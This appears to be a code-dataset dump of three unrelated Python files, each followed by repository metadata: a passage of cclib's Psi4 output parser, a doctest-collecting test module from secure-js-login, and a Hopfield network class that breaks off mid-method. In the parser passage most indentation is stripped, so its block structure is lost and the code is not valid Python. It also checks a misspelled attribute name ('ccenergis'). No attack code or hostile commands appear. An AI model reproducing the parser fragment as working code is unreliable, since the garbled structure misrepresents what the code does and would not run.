primitives = [list(map(float, pl.split())) for pl in primitives_lines]
# Un-normalize the coefficients. Psi prints the normalized coefficient
# of the highest polynomial, namely XX for D orbitals, XXX for F, and so on.
for iprim, prim in enumerate(primitives):
exp, coef = prim
coef = coef / get_normalization_factor(exp, momentum, 0, 0)
primitives[iprim] = [exp, coef]
primitives = [tuple(p) for p in primitives]
shell = [shell_type, primitives]
gbasis[-1].append(shell)
line = next(inputfile)
line = next(inputfile)
# We will also need to add symmetry atoms that are missing from the input
# at the end of this block, if the symmetry atoms are last.
while len(gbasis) < self.natom:
gbasis.append(get_symmetry_atom_basis(gbasis))
self.gbasis = gbasis
# A block called 'Calculation Information' prints these before starting the SCF.
if (self.section == "Pre-Iterations") and ("Number of atoms" in line):
natom = int(line.split()[-1])
self.set_attribute('natom', natom)
if (self.section == "Pre-Iterations") and ("Number of atomic orbitals" in line):
nbasis = int(line.split()[-1])
self.set_attribute('nbasis', nbasis)
if (self.section == "Pre-Iterations") and ("Total" in line):
chomp = line.split()
nbasis = int(chomp[1])
self.set_attribute('nbasis', nbasis)
# ==> Iterations <==
# Psi4 converges both the SCF energy and density elements and reports both in the
# iterations printout. However, the default convergence scheme involves a density-fitted
        # algorithm for efficiency, and this is often followed by a second pass with exact electron
# repulsion integrals. In that case, there are actually two convergence cycles performed,
# one for the density-fitted algorithm and one for the exact one, and the iterations are
# printed in two blocks separated by some set-up information.
if (self.section == "Iterations") and (line.strip() == "==> Iterations <==") \
and not hasattr(self, 'finite_difference'):
if not hasattr(self, 'scfvalues'):
self.scfvalues = []
scfvals = []
self.skip_lines(inputfile, ['b', 'header', 'b'])
line = next(inputfile)
# Read each SCF iteration.
while line.strip() != "==> Post-Iterations <==":
if line.strip() and line.split()[0][0] == '@':
denergy = float(line.split()[4])
ddensity = float(line.split()[5])
scfvals.append([denergy, ddensity])
try:
line = next(inputfile)
except StopIteration:
self.logger.warning('File terminated before end of last SCF! Last density err: {}'.format(ddensity))
break
self.section = "Post-Iterations"
self.scfvalues.append(scfvals)
# This section, from which we parse molecular orbital symmetries and
# orbital energies, is quite similar for both Psi3 and Psi4, and in fact
        # the format for orbitals is the same, although the headers and spacers
# are a bit different. Let's try to get both parsed with one code block.
#
# Here is how the block looks like for Psi4:
#
# Orbital Energies (a.u.)
# -----------------------
#
# Doubly Occupied:
#
# 1Bu -11.040586 1Ag -11.040524 2Bu -11.031589
# 2Ag -11.031589 3Bu -11.028950 3Ag -11.028820
# (...)
# 15Ag -0.415620 1Bg -0.376962 2Au -0.315126
# 2Bg -0.278361 3Bg -0.222189
#
# Virtual:
#
# 3Au 0.198995 4Au 0.268517 4Bg 0.308826
# 5Au 0.397078 5Bg 0.521759 16Ag 0.565017
# (...)
# 24Ag 0.990287 24Bu 1.027266 25Ag 1.107702
# 25Bu 1.124938
#
# The case is different in the trigger string.
if ("orbital energies (a.u.)" in line.lower() or "orbital energies [eh]" in line.lower()) \
and not hasattr(self, 'finite_difference'):
# If this is Psi4, we will be in the appropriate section.
assert self.section == "Post-Iterations"
self.moenergies = [[]]
self.mosyms = [[]]
# Psi4 has dashes under the trigger line, but Psi3 did not.
self.skip_line(inputfile, 'dashes')
self.skip_line(inputfile, 'blank')
# Both versions have this case-insensitive substring.
occupied = next(inputfile)
if self.reference[0:2] == 'RO' or self.reference[0:1] == 'R':
assert 'doubly occupied' in occupied.lower()
elif self.reference[0:1] == 'U':
assert 'alpha occupied' in occupied.lower()
self.skip_line(inputfile, 'blank')
# Parse the occupied MO symmetries and energies.
self._parse_mosyms_moenergies(inputfile, 0)
# The last orbital energy here represents the HOMO.
self.homos = [len(self.moenergies[0])-1]
# For a restricted open-shell calculation, this is the
# beta HOMO, and we assume the singly-occupied orbitals
# are all alpha, which are handled next.
if self.reference[0:2] == 'RO':
self.homos.append(self.homos[0])
unoccupied = next(inputfile)
if self.reference[0:2] == 'RO':
assert unoccupied.strip() == 'Singly Occupied:'
elif self.reference[0:1] == 'R':
assert unoccupied.strip() == 'Virtual:'
elif self.reference[0:1] == 'U':
assert unoccupied.strip() == 'Alpha Virtual:'
# Psi4 now has a blank line, Psi3 does not.
self.skip_line(inputfile, 'blank')
# Parse the unoccupied MO symmetries and energies.
self._parse_mosyms_moenergies(inputfile, 0)
# Here is where we handle the Beta or Singly occupied orbitals.
if self.reference[0:1] == 'U':
self.mosyms.append([])
self.moenergies.append([])
line = next(inputfile)
assert line.strip() == 'Beta Occupied:'
self.skip_line(inputfile, 'blank')
self._parse_mosyms_moenergies(inputfile, 1)
self.homos.append(len(self.moenergies[1])-1)
line = next(inputfile)
assert line.strip() == 'Beta Virtual:'
self.skip_line(inputfile, 'blank')
self._parse_mosyms_moenergies(inputfile, 1)
elif self.reference[0:2] == 'RO':
line = next(inputfile)
assert line.strip() == 'Virtual:'
self.skip_line(inputfile, 'blank')
self._parse_mosyms_moenergies(inputfile, 0)
line = next(inputfile)
assert line.strip() == 'Final Occupation by Irrep:'
line = next(inputfile)
irreps = line.split()
line = next(inputfile)
tokens = line.split()
assert tokens[0] == 'DOCC'
docc = sum([int(x.replace(',', '')) for x in tokens[2:-1]])
line = next(inputfile)
if line.strip():
tokens = line.split()
assert tokens[0] in ('SOCC', 'NA')
socc = sum([int(x.replace(',', '')) for x in tokens[2:-1]])
# Fix up the restricted open-shell alpha HOMO.
if self.reference[0:2] == 'RO':
self.homos[0] += socc
# Both Psi3 and Psi4 print the final SCF energy right after the orbital energies,
# but the label is different. Psi4 also does DFT, and the label is also different in that case.
if self.section == "Post-Iterations" and "Final Energy:" in line \
and not hasattr(self, 'finite_difference'):
e = float(line.split()[3])
if not hasattr(self, 'scfenergies'):
self.scfenergies = []
self.scfenergies.append(utils.convertor(e, 'hartree', 'eV'))
if self.subsection == "Energetics":
if "Empirical Dispersion Energy" in line:
dispersion = utils.convertor(float(line.split()[-1]), "hartree", "eV")
self.append_attribute("dispersionenergies", dispersion)
# ==> Molecular Orbitals <==
#
# 1 2 3 4 5
#
# 1 H1 s0 0.1610392 0.1040990 0.0453848 0.0978665 1.0863246
# 2 H1 s0 0.3066996 0.0742959 0.8227318 1.3460922 -1.6429494
# 3 H1 s0 0.1669296 1.5494169 -0.8885631 -1.8689490 1.0473633
# 4 H2 s0 0.1610392 -0.1040990 0.0453848 -0.0978665 -1.0863246
# 5 H2 s0 0.3066996 -0.0742959 0.8227318 -1.3460922 1.6429494
# 6 H2 s0 0.1669296 -1.5494169 -0.8885631 1.8689490 -1.0473633
#
# Ene -0.5279195 0.1235556 0.3277474 0.5523654 2.5371710
# Sym Ag B3u Ag B3u B3u
# Occ 2 0 0 0 0
#
#
# 6
#
# 1 H1 s0 1.1331221
# 2 H1 s0 -1.2163107
# 3 H1 s0 0.4695317
# 4 H2 s0 1.1331221
# 5 H2 s0 -1.2163107
# 6 H2 s0 0.4695317
#
# Ene 2.6515637
# Sym Ag
# Occ 0
if (self.section) and ("Molecular Orbitals" in self.section) \
and ("Molecular Orbitals" in line) and not hasattr(self, 'finite_difference'):
self.skip_line(inputfile, 'blank')
mocoeffs = []
indices = next(inputfile)
while indices.strip():
if indices[:3] == '***':
break
indices = [int(i) for i in indices.split()]
if len(mocoeffs) < indices[-1]:
for i in range(len(indices)):
mocoeffs.append([])
else:
assert len(mocoeffs) == indices[-1]
self.skip_line(inputfile, 'blank')
n = len(indices)
line = next(inputfile)
while line.strip():
chomp = line.split()
m = len(chomp)
iao = int(chomp[0])
coeffs = [float(c) for c in chomp[m - n:]]
for i, c in enumerate(coeffs):
mocoeffs[indices[i]-1].append(c)
line = next(inputfile)
energies = next(inputfile)
symmetries = next(inputfile)
occupancies = next(inputfile)
self.skip_lines(inputfile, ['b', 'b'])
indices = next(inputfile)
if not hasattr(self, 'mocoeffs'):
self.mocoeffs = []
self.mocoeffs.append(mocoeffs)
# The formats for Mulliken and Lowdin atomic charges are the same, just with
# the name changes, so use the same code for both.
#
# Properties computed using the SCF density density matrix
# Mulliken Charges: (a.u.)
# Center Symbol Alpha Beta Spin Total
# 1 C 2.99909 2.99909 0.00000 0.00182
# 2 C 2.99909 2.99909 0.00000 0.00182
# ...
for pop_type in ["Mulliken", "Lowdin"]:
if line.strip() == "%s Charges: (a.u.)" % pop_type:
if not hasattr(self, 'atomcharges'):
self.atomcharges = {}
header = next(inputfile)
line = next(inputfile)
while not line.strip():
line = next(inputfile)
charges = []
while line.strip():
ch = float(line.split()[-1])
charges.append(ch)
line = next(inputfile)
self.atomcharges[pop_type.lower()] = charges
# This is for the older conventional MP2 code in 4.0b5.
mp_trigger = "MP2 Total Energy (a.u.)"
if line.strip()[:len(mp_trigger)] == mp_trigger:
self.metadata["methods"].append("MP2")
mpenergy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# This is for the newer DF-MP2 code in 4.0.
if 'DF-MP2 Energies' in line:
self.metadata["methods"].append("DF-MP2")
while 'Total Energy' not in line:
line = next(inputfile)
mpenergy = utils.convertor(float(line.split()[3]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# Note this is just a start and needs to be modified for CCSD(T), etc.
ccsd_trigger = "* CCSD total energy"
if line.strip()[:len(ccsd_trigger)] == ccsd_trigger:
self.metadata["methods"].append("CCSD")
ccsd_energy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, "ccenergis"):
self.ccenergies = []
self.ccenergies.append(ccsd_energy)
# The geometry convergence targets and values are printed in a table, with the legends
# describing the convergence annotation. Probably exact slicing of the line needs
# to be done in order to extract the numbers correctly. If there are no values for
        # a particular target it means they are not used (marked also with an 'o'), and in this case
# we will set a value of numpy.inf so that any value will be smaller.
#
# ==> Convergence Check <==
#
# Measures of convergence in internal coordinates in au.
# Criteria marked as inactive (o), active & met (*), and active & unmet ( ).
# ---------------------------------------------------------------------------------------------
# Step Total Energy Delta E MAX Force RMS Force MAX Disp RMS Disp
# ---------------------------------------------------------------------------------------------
# Convergence Criteria 1.00e-06 * 3.00e-04 * o 1.20e-03 * o
# ---------------------------------------------------------------------------------------------
# 2 -379.77675264 -7.79e-03 1.88e-02 4.37e-03 o 2.29e-02 6.76e-03 o ~
# ---------------------------------------------------------------------------------------------
#
if (self.section == "Convergence Check") and line.strip() == "==> Convergence Check <==" \
and not hasattr(self, 'finite_difference'):
if not hasattr(self, "optstatus"):
self.optstatus = []
self.optstatus.append(data.ccData.OPT_UNKNOWN)
self.skip_lines(inputfile, ['b', 'units', 'comment', 'dash+tilde', 'header', 'dash+tilde'])
            # These are the positions in the line at which the numbers should start.
starts = [27, 41, 55, 69, 83]
criteria = next(inputfile)
geotargets = []
for istart in starts:
if criteria[istart:istart+9].strip():
geotargets.append(float(criteria[istart:istart+9]))
else:
geotargets.append(numpy.inf)
self.skip_line(inputfile, 'dashes')
values = next(inputfile)
step = int(values.split()[0])
geovalues = []
for istart in starts:
if values[istart:istart+9].strip():
geovalues.append(float(values[istart:istart+9]))
if step == 1:
self.optstatus[-1] += data.ccData.OPT_NEW
# This assertion may be too restrictive, but we haven't seen the geotargets change.
# If such an example comes up, update the value since we're interested in the last ones.
if not hasattr(self, 'geotargets'):
self.geotargets = geotargets
else:
assert self.geotargets == geotargets
if not hasattr(self, 'geovalues'):
self.geovalues = []
self.geovalues.append(geovalues)
# This message signals a converged optimization, in which case we want
# to append the index for this step to optdone, which should be equal
# to the number of geovalues gathered so far.
if "Optimization is complete!" in line:
# This is a workaround for Psi4.0/sample_opt-irc-2.out;
# IRC calculations currently aren't parsed properly for
# optimization parameters.
if hasattr(self, 'geovalues'):
if not hasattr(self, 'optdone'):
self.optdone = []
self.optdone.append(len(self.geovalues))
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_DONE
# This message means that optimization has stopped for some reason, but we
# still want optdone to exist in this case, although it will be an empty list.
if line.strip() == "Optimizer: Did not converge!":
if not hasattr(self, 'optdone'):
self.optdone = []
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_UNCONVERGED
        # The reference point at which properties are evaluated in Psi4 is explicitly stated,
# so we can save it for later. It is not, however, a part of the Properties section,
        # but it appears before it and also in other places where properties that might depend
# on it are printed.
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 Bohr
#
# OR
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 [a0]
#
if "Properties will be evaluated at" in line.strip():
self.origin = numpy.array([float(x.strip(',')) for x in line.split()[-4:-1]])
assert line.split()[-1] in ["Bohr", "[a0]"]
self.origin = utils.convertor(self.origin, 'bohr', 'Angstrom')
        # The properties section prints the molecular dipole moment:
#
# ==> Properties <==
#
#
#Properties computed using the SCF density density matrix
# Nuclear Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Electronic Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000 Total: 0.0000
#
if (self.section == "Properties") and line.strip() == "Dipole Moment: (a.u.)":
line = next(inputfile)
dipole = numpy.array([float(line.split()[1]), float(line.split()[3]), float(line.split()[5])])
dipole = utils.convertor(dipole, "ebohr", "Debye")
if not hasattr(self, 'moments'):
# Old versions of Psi4 don't print the origin; assume
# it's at zero.
if not hasattr(self, 'origin'):
self.origin = numpy.array([0.0, 0.0, 0.0])
self.moments = [self.origin, dipole]
else:
try:
assert numpy.all(self.moments[1] == dipole)
except AssertionError:
self.logger.warning('Overwriting previous multipole moments with new values')
self.logger.warning('This could be from post-HF properties or geometry optimization')
self.moments = [self.origin, dipole]
# Higher multipole moments are printed separately, on demand, in lexicographical order.
#
# Multipole Moments:
#
# ------------------------------------------------------------------------------------
# Multipole Electric (a.u.) Nuclear (a.u.) Total (a.u.)
# ------------------------------------------------------------------------------------
#
# L = 1. Multiply by 2.5417462300 to convert to Debye
# Dipole X : 0.0000000 0.0000000 0.0000000
# Dipole Y : 0.0000000 0.0000000 0.0000000
# Dipole Z : 0.0000000 0.0000000 0.0000000
#
# L = 2. Multiply by 1.3450341749 to convert to Debye.ang
# Quadrupole XX : -1535.8888701 1496.8839996 -39.0048704
# Quadrupole XY : -11.5262958 11.4580038 -0.0682920
# ...
#
if line.strip() == "Multipole Moments:":
self.skip_lines(inputfile, ['b', 'd', 'header', 'd', 'b'])
# The reference used here should have been printed somewhere
# before the properties and parsed above.
moments = [self.origin]
line = next(inputfile)
while "----------" not in line.strip():
rank = int(line.split()[2].strip('.'))
multipole = []
line = next(inputfile)
while line.strip():
value = float(line.split()[-1])
fromunits = "ebohr" + (rank > 1)*("%i" % rank)
tounits = "Debye" + (rank > 1)*".ang" + (rank > 2)*("%i" % (rank-1))
value = utils.convertor(value, fromunits, tounits)
multipole.append(value)
line = next(inputfile)
multipole = numpy.array(multipole)
moments.append(multipole)
line = next(inputfile)
if not hasattr(self, 'moments'):
self.moments = moments
else:
for im, m in enumerate(moments):
if len(self.moments) <= im:
self.moments.append(m)
else:
assert numpy.allclose(self.moments[im], m, atol=1.0e4)
## Analytic Gradient
# -Total Gradient:
# Atom X Y Z
# ------ ----------------- ----------------- -----------------
# 1 -0.000000000000 0.000000000000 -0.064527252292
# 2 0.000000000000 -0.028380539652 0.032263626146
# 3 -0.000000000000 0.028380539652 0.032263626146
## Finite Differences Gradient
# -------------------------------------------------------------
# ## F-D gradient (Symmetry 0) ##
# Irrep: 1 Size: 3 x 3
#
# 1 2 3
#
# 1 0.00000000000000 0.00000000000000 -0.02921303282515
# 2 0.00000000000000 -0.00979709321487 0.01460651641258
# 3 0.00000000000000 0.00979709321487 0.01460651641258
if line.strip() in Psi4.GRADIENT_HEADERS:
# Handle the different header lines between analytic and
# numerical gradients.
gradient_skip_lines = [
info.skip_lines
for info in Psi4.GRADIENT_TYPES.values()
if info.header == line.strip()
][0]
gradient = self.parse_gradient(inputfile, gradient_skip_lines)
if not hasattr(self, 'grads'):
self.grads = []
self.grads.append(gradient)
# OLD Normal mode output parser (PSI4 < 1)
## Harmonic frequencies.
# -------------------------------------------------------------
# Computing second-derivative from gradients using projected,
# symmetry-adapted, cartesian coordinates (fd_freq_1).
# 74 gradients passed in, including the reference geometry.
# Generating complete list of displacements from unique ones.
# Operation 2 takes plus displacements of irrep Bg to minus ones.
# Operation 3 takes plus displacements of irrep Au to minus ones.
# Operation 2 takes plus displacements of irrep Bu to minus ones.
# Irrep Harmonic Frequency
# (cm-1)
# -----------------------------------------------
# Au 137.2883
if line.strip() == 'Irrep Harmonic Frequency':
vibsyms = []
vibfreqs = []
self.skip_lines(inputfile, ['(cm-1)', 'dashes'])
## The first section contains the symmetry of each normal
## mode and its frequency.
line = next(inputfile)
while '---' not in line:
chomp = line.split()
vibsym = chomp[0]
vibfreq = Psi4.parse_vibfreq(chomp[1])
vibsyms.append(vibsym)
vibfreqs.append(vibfreq)
line = next(inputfile)
self.set_attribute('vibsyms', vibsyms)
self.set_attribute('vibfreqs', vibfreqs)
line = next(inputfile)
assert line.strip() == ''
line = next(inputfile)
assert 'Normal Modes' in line
line = next(inputfile)
assert 'Molecular mass is' in line
if hasattr(self, 'atommasses'):
assert abs(float(line.split()[3]) - sum(self.atommasses)) < 1.0e-4
line = next(inputfile)
assert line.strip() == 'Frequencies in cm^-1; force constants in au.'
line = next(inputfile)
assert line.strip() == ''
line = next(inputfile)
## The second section contains the frequency, force
## constant, and displacement for each normal mode, along
## with the atomic masses.
# Normal Modes (non-mass-weighted).
# Molecular mass is 130.07825 amu.
# Frequencies in cm^-1; force constants in au.
# Frequency: 137.29
# Force constant: 0.0007
# X Y Z mass
# C 0.000 0.000 0.050 12.000000
# C 0.000 0.000 0.050 12.000000
for vibfreq in self.vibfreqs:
_vibfreq = Psi4.parse_vibfreq(line[13:].strip())
assert abs(vibfreq - _vibfreq) < 1.0e-2
line = next(inputfile)
assert 'Force constant:' in line
if not hasattr(self, "vibfconsts"):
self.vibfconsts = []
self.vibfconsts.append(
utils.convertor(float(line.split()[2]), "hartree/bohr2", "mDyne/angstrom")
)
line = next(inputfile)
assert 'X Y Z mass' in line
line = next(inputfile)
if not hasattr(self, 'vibdisps'):
self.vibdisps = []
normal_mode_disps = []
# for k in range(self.natom):
while line.strip():
chomp = line.split()
# Do nothing with this for now.
atomsym = chomp[0]
atomcoords = [float(x) for x in chomp[1:4]]
# Do nothing with this for now.
atommass = float(chomp[4])
normal_mode_disps.append(atomcoords)
line = next(inputfile)
self.vibdisps.append(normal_mode_disps)
line = next(inputfile)
# NEW Normal mode output parser (PSI4 >= 1)
# ==> Harmonic Vibrational Analysis <==
# ...
# Vibration 7 8 9
# ...
#
# Vibration 10 11 12
# ...
if line.strip() == '==> Harmonic Vibrational Analysis <==':
vibsyms = []
vibfreqs = []
vibdisps = []
vibrmasses = []
vibfconsts = []
# Skip lines till the first Vibration block
while not line.strip().startswith('Vibration'):
line = next(inputfile)
n_modes = 0
# Parse all the Vibration blocks
while line.strip().startswith('Vibration'):
n = len(line.split()) - 1
n_modes += n
vibfreqs_, vibsyms_, vibdisps_, vibrmasses_, vibfconsts_ = self.parse_vibration(n, inputfile)
vibfreqs.extend(vibfreqs_)
vibsyms.extend(vibsyms_)
vibdisps.extend(vibdisps_)
vibrmasses.extend(vibrmasses_)
vibfconsts.extend(vibfconsts_)
line = next(inputfile)
# It looks like the symmetry of the normal mode may be missing
# from some / most. Only include them if they are there for all
if len(vibfreqs) == n_modes:
self.set_attribute('vibfreqs', vibfreqs)
if len(vibsyms) == n_modes:
self.set_attribute('vibsyms', vibsyms)
if len(vibdisps) == n_modes:
self.set_attribute('vibdisps', vibdisps)
if len(vibrmasses) == n_modes:
self.set_attribute('vibrmasses', vibrmasses)
if len(vibfconsts) == n_modes:
self.set_attribute('vibfconsts', vibfconsts)
# Second one is 1.0, first one is 1.2 and newer
if (self.section == "Thermochemistry Energy Analysis" and "Thermochemistry Energy Analysis" in line) \
or (self.section == "Energy Analysis" and "Energy Analysis" in line):
self.skip_lines(
inputfile,
[
"b",
"Raw electronic energy",
"Total E0",
"b",
"Zero-point energy, ZPE_vib = Sum_i nu_i / 2",
"Electronic ZPE",
"Translational ZPE",
"Rotational ZPE"
]
)
line = next(inputfile)
assert "Vibrational ZPE" in line
self.set_attribute("zpve", float(line.split()[6]))
# If finite difference is used to compute forces (i.e. by displacing
# slightly all the atoms), a series of additional scf calculations is
# performed. Orbitals, geometries, energies, etc. for these shouldn't be
# included in the parsed data.
if line.strip().startswith('Using finite-differences of gradients'):
self.set_attribute('finite_difference', True)
# This is the result of calling `print_variables()` and contains all
# current inner variables known to Psi4.
if line.strip() == "Variable Map:":
self.skip_line(inputfile, "d")
line = next(inputfile)
while line.strip():
tokens = line.split()
# Remove double quotation marks
name = " ".join(tokens[:-2])[1:-1]
value = float(tokens[-1])
if name == "CC T1 DIAGNOSTIC":
self.metadata["t1_diagnostic"] = value
line = next(inputfile)
if line[:54] == '*** Psi4 exiting successfully. Buy a developer a beer!'\
or line[:54] == '*** PSI4 exiting successfully. Buy a developer a beer!':
self.metadata['success'] = True
def _parse_mosyms_moenergies(self, inputfile, spinidx):
"""Parse molecular orbital symmetries and energies from the
'Post-Iterations' section.
"""
line = next(inputfile)
while line.strip():
for i in range(len(line.split()) // 2):
self.mosyms[spinidx].append(line.split()[i*2][-2:])
moenergy = utils.convertor(float(line.split()[i*2+1]), "hartree", "eV")
self.moenergies[spinidx].append(moenergy)
line = next(inputfile)
return
def parse_gradient(self, inputfile, skip_lines):
"""Parse the nuclear gradient section into a list of lists with shape
[natom, 3].
"""
self.skip_lines(inputfile, skip_lines)
line = next(inputfile)
gradient = []
while line.strip():
idx, x, y, z = line.split()
gradient.append((float(x), float(y), float(z)))
line = next(inputfile)
return gradient
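# For the three-atom analytic-gradient block quoted earlier in this file,
# parse_gradient would return roughly (values copied from that example
# comment, not from an actual run):
#   [(-0.0, 0.0, -0.064527252292),
#    (0.0, -0.028380539652, 0.032263626146),
#    (-0.0, 0.028380539652, 0.032263626146)]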
@staticmethod
def parse_vibration(n, inputfile):
# Freq [cm^-1] 1501.9533 1501.9533 1501.9533
# Irrep
# Reduced mass [u] 1.1820 1.1820 1.1820
# Force const [mDyne/A] 1.5710 1.5710 1.5710
# Turning point v=0 [a0] 0.2604 0.2604 0.2604
# RMS dev v=0 [a0 u^1/2] 0.2002 0.2002 0.2002
# Char temp [K] 2160.9731 2160.9731 2160.9731
# ----------------------------------------------------------------------------------
# 1 C -0.00 0.01 0.13 -0.00 -0.13 0.01 -0.13 0.00 -0.00
# 2 H 0.33 -0.03 -0.38 0.02 0.60 -0.02 0.14 -0.01 -0.32
# 3 H -0.32 -0.03 -0.37 -0.01 0.60 -0.01 0.15 -0.01 0.33
# 4 H 0.02 0.32 -0.36 0.01 0.16 -0.34 0.60 -0.01 0.01
# 5 H 0.02 -0.33 -0.39 0.01 0.13 0.31 0.60 0.01 0.01
line = next(inputfile)
assert 'Freq' in line
chomp = line.split()
vibfreqs = [Psi4.parse_vibfreq(x) for x in chomp[-n:]]
line = next(inputfile)
assert 'Irrep' in line
chomp = line.split()
vibsyms = [irrep for irrep in chomp[1:]]
line = next(inputfile)
assert 'Reduced mass' in line
chomp = line.split()
vibrmasses = [utils.float(x) for x in chomp[3:]]
line = next(inputfile)
assert 'Force const' in line
chomp = line.split()
vibfconsts = [utils.float(x) for x in chomp[3:]]
line = next(inputfile)
assert 'Turning point' in line
line = next(inputfile)
assert 'RMS dev' in line
line = next(inputfile)
assert 'Char temp' in line
line = next(inputfile)
assert '---' in line
line = next(inputfile)
vibdisps = [ [] for i in range(n)]
while len(line.strip()) > 0:
chomp = line.split()
for i in range(n):
start = len(chomp) - (n - i) * 3
stop = start + 3
mode_disps = [float(c) for c in chomp[start:stop]]
vibdisps[i].append(mode_disps)
line = next(inputfile)
return vibfreqs, vibsyms, vibdisps, vibrmasses, vibfconsts
@staticmethod
def parse_vibfreq(vibfreq):
"""Imaginary frequencies are printed as '12.34i', rather than
'-12.34'.
"""
is_imag = vibfreq[-1] == 'i'
if is_imag:
return -float(vibfreq[:-1])
else:
return float(vibfreq)
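# Quick illustration of the helper above, using the notation its docstring
# describes (example strings only, not taken from an actual output file):
#   parse_vibfreq("1501.9533") -> 1501.9533
#   parse_vibfreq("12.34i")    -> -12.34   (imaginary mode, returned as negative)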
|
cclib/cclib
|
cclib/parser/psi4parser.py
|
Python
|
bsd-3-clause
| 54,010
|
[
"Psi4",
"cclib"
] |
b7347e0934df28f72f9348716d3424ce77832dd3ee355e5f8fffdf68b0f9fb54
|
# coding: utf-8
"""
Secure JavaScript Login
~~~~~~~~~~~~~~~~~~~~~~~
:copyleft: 2015 by the secure-js-login team, see AUTHORS for more details.
:created: by JensDiemer.de
:license: GNU GPL v3 or above, see LICENSE for more details
"""
from __future__ import unicode_literals, print_function
import os
import doctest
import sys
import secure_js_login
SKIP_DIRS = (".settings", ".git", "dist", ".egg-info")
SKIP_FILES = ("setup.py", "test.py")
def get_all_doctests(base_path, verbose=False):
modules = []
for root, dirs, filelist in os.walk(base_path, followlinks=True):
for skip_dir in SKIP_DIRS:
if skip_dir in dirs:
dirs.remove(skip_dir) # don't visit these directories
for filename in filelist:
if not filename.endswith(".py"):
continue
if filename in SKIP_FILES:
continue
sys.path.insert(0, root)
try:
module = __import__(filename[:-3])
except ImportError as err:
if verbose:
print(
"\tDocTest import %s error %s" % (filename, err),
file=sys.stderr
)
except Exception as err:
if verbose:
print(
"\tDocTest %s error %s" % (filename, err),
file=sys.stderr
)
else:
try:
suite = doctest.DocTestSuite(module)
except ValueError: # has no docstrings
continue
test_count = suite.countTestCases()
if test_count<1:
if verbose:
print(
"\tNo DocTests in %r" % module.__name__,
file=sys.stderr
)
continue
if verbose:
file_info = module.__file__
else:
file_info = module.__name__
print(
"\t%i DocTests in %r" % (test_count,file_info),
file=sys.stderr
)
modules.append(module)
finally:
del sys.path[0]
return modules
def load_tests(loader, tests, ignore):
print("\ncollect DocTests:", file=sys.stderr)
path = os.path.abspath(os.path.dirname(secure_js_login.__file__))
modules = get_all_doctests(
base_path=path,
# verbose=True
)
for module in modules:
tests.addTests(doctest.DocTestSuite(module))
return tests
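# load_tests() implements the standard unittest "load_tests protocol", so the
# doctests collected above run alongside the regular test suite. A minimal way
# to trigger it (assuming the usual project layout) would be something like:
#   python -m unittest tests.test_doctests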
|
jedie/django-secure-js-login
|
tests/test_doctests.py
|
Python
|
gpl-3.0
| 2,713
|
[
"VisIt"
] |
c3fd224c60b6035a365e5af619373cf36d740f7336a847d89001e77a6222a96d
|
import numpy as np
import random
class HopfieldNetwork:
"""
(C) Daniel McNeela, 2016
Implements the Hopfield Network, a recurrent neural network developed by John Hopfield
circa 1982.
c.f. https://en.wikipedia.org/wiki/Hopfield_Network
"""
def __init__(self, num_neurons, activation_fn=None):
"""
Instantiates a Hopfield Network comprised of "num_neurons" neurons.
num_neurons The number of neurons in the network.
_weights The network's weight matrix.
_trainers A dictionary containing the methods available for
training the network.
_vec_activation A vectorized version of the network's activation function.
"""
self.num_neurons = num_neurons
self._weights = np.zeros((self.num_neurons, self.num_neurons), dtype=np.int_)
self._trainers = {"hebbian": self._hebbian, "storkey": self._storkey}
self._learn_modes = {"synchronous": self._synchronous, "asynchronous": self._asynchronous}
self._vec_activation = np.vectorize(self._activation)
self._train_act = np.vectorize(self._train_activation)
def weights(self):
"""
Getter method for the network's weight matrix.
"""
return self._weights
def reset(self):
"""
Resets the network's weight matrix to the matrix which is identically zero.
Useful for retraining the network from scratch after an initial round
of training has already been completed.
"""
self._weights = np.zeros((self.num_neurons, self.num_neurons), dtype=np.int_)
def train(self, patterns, method="hebbian", threshold=0, inject = lambda x, y: None):
"""
The wrapper method for the network's various training algorithms stored in
self._trainers.
patterns A list of the patterns on which to train the network. Patterns are
bipolar vectors of the form
[random.choice([-1, 1]) for i in range(self.num_neurons)].
Example of properly formatted input for a Hopfield Network
containing three neurons:
[[-1, 1, 1], [1, -1, 1]]
method The training algorithm to be used. Defaults to "hebbian".
Look to self._trainers for a list of the available options.
threshold The threshold value for the network's activation function.
Defaults to 0.
"""
try:
return self._trainers[method](patterns, threshold, inject)
except KeyError:
print(method + " is not a valid training method.")
def learn(self, patterns, steps=None, mode="asynchronous", inject=lambda state, step: None):
"""
Wrapper method for self._synchronous and self._asynchronous.
To be used after training the network.
patterns The input vectors to learn
steps Number of steps to compute. Defaults to None.
Given 'patterns', learn(patterns) classifies these patterns based on those
which the network has already seen.
"""
try:
return self._learn_modes[mode](patterns, steps, inject)
except KeyError:
print(mode + " is not a valid learning mode.")
def energy(self, state):
"""
Returns the energy for any input to the network.
"""
return -0.5 * np.sum(np.multiply(np.outer(state, state), self._weights))
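# The method above evaluates the usual Hopfield energy
#     E(s) = -1/2 * sum_ij w_ij * s_i * s_j
# via an outer product of the state with itself; stored patterns sit at
# (local) minima of this energy.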
def _synchronous(self, patterns, steps=10, inject=lambda state, step: None):
"""
Updates all network neurons simultaneously during each iteration of the
learning process.
Faster than asynchronous updating, but convergence of the learning method
is not guaranteed.
"""
if steps:
for i in range(steps):
patterns = np.dot(patterns, self._weights)
return self._vec_activation(patterns)
else:
while True:
post_learn = self._vec_activation(np.dot(patterns, self._weights))
if np.array_equal(patterns, post_learn):
return self._vec_activation(post_learn)
patterns = post_learn
def _asynchronous(self, patterns, steps=None, inject=lambda state, step: None):
"""
Updates a single, randomly selected neuron during each iteration of the learning
process.
Convergence is guaranteed, but the learning is slower than when neurons are updated
in synchrony.
"""
patterns = np.array(patterns)
if steps:
for i in range(steps):
